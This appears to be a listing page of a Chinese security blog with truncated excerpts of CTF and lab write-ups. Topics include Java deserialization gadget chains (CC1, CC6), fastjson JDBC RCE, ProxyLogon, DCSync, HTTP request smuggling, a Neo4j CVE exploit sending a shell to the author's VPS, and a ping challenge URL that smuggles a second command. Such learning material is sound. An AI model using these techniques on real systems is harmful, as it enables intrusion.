Java字节码 java字节码其实仅仅指的事java虚拟机执行使用的一类指令，通常被存储在.class文件中 他是java程序编译后生成的一种中间表示形式，是介于机器码和源代码之间的可移植指令集，因为java程序执行不依赖具体操作系统或硬件架构，而是通过JVM来解释执行或编译的 你甚至可以使用kotlin等等非java的语言编写程序，只要你的编译器能将其编译成.class文件，他们都可以在JVM上…

CC6链 和CC1链子相比，CC1链子是利用了LazyMap，而CC6总结下来其实就是URLDNS+CC1一半 出现了个问题，我在清理磁盘空间时，不小心把部分截图噶了，mac没带实验室来，晚上回去补上o(╥﹏╥)o 环境配置 jdk 8u71 CommonsCollectiion >3.2.1 简单利用链 /*Gadget chain:java.io.ObjectInputStream.re…

fscan扫一下   ___                             _ / _ \     ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ …

考点: 华夏ERP信息泄露 fastjson 1.2.55+JDBC RCE ProxyLogon writeDacl写DCSync 一个比较低能的压缩包解密 拿到ip利用fscan扫一下，发现具有华夏ERP漏洞 ​   ___                       &nb…

说在前面 其他cc链整合起来到时候一块发，现在感觉写的有点乱，先把cc1发出来 简单介绍 CC1全称Commons-Collections1，是利用了Apache Commons项目中的Commons-Collections库的一个反序列化漏洞 Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库，它提供了很多强大的数据结构类型和…

“ HTTP Request Smuggling（http请求走私）实战中比较少见，但是此漏洞可能造成很大的影响 请求走私主要与HTTP/1请求相关，但是支持HTTP/2的网站可能容易受到攻击，具体取决于其后端架构 ” 简单介绍 作为一种攻击，利用HTTP协议中存在的不一致性，攻击者通过发送特殊构造的http请求，欺骗代理服务器，负载均衡器或者Web服务器中的中间节点，从而可以绕过安全机制 可能造…

介绍 java序列化指把java对象转换为字节序列的过程便于保存到内存或文件当中，也可实现持久化存储，反序列化即把字节序列回复为java对象的过程 序列化和反序列化的实现 相关方法 ObjectOutputStream 类的 writeObject() 方法可以实现序列化。按 Java 的标准约定是给文件一个 .ser 扩展名 ObjectInputStream 类的 readObject() 方…

利用fscan扫描一下靶机 Neo4j Browser，存在nday CVE-2021-34371 https://github.com/zwjjustdoit/CVE-2021-34371.jar 弹个shell到自己vps上，去用户目录下 cd /d F:\CVE2021-34371\CVE-2021-34371.jar-main java -cp "javassist-3.28.0-GA.j…

极限命令执行6 题目源码 <?phperror_reporting(0);if (isset($_POST['ctf_show'])) {   $ctfshow = $_POST['ctf_show'];   if (is_string($ctfshow) && strlen($ctfshow) <= 3) {      …

说在前面 打算重新刷一下buu，主播的暑假属实有些艰难了，去了不少医院，自己在家住，还被人盯上了，得亏主包敏感叫了警卫，不然真让偷家了，建议大家以后不要熬夜学习了o(╥﹏╥)o身体第一 [GXYCTF2019]Ping Ping Ping 读源码 http://568f64f9-c8b5-4dfc-b393-964911fa458d.node5.buuoj.cn:81?ip=127.0.0.1;c…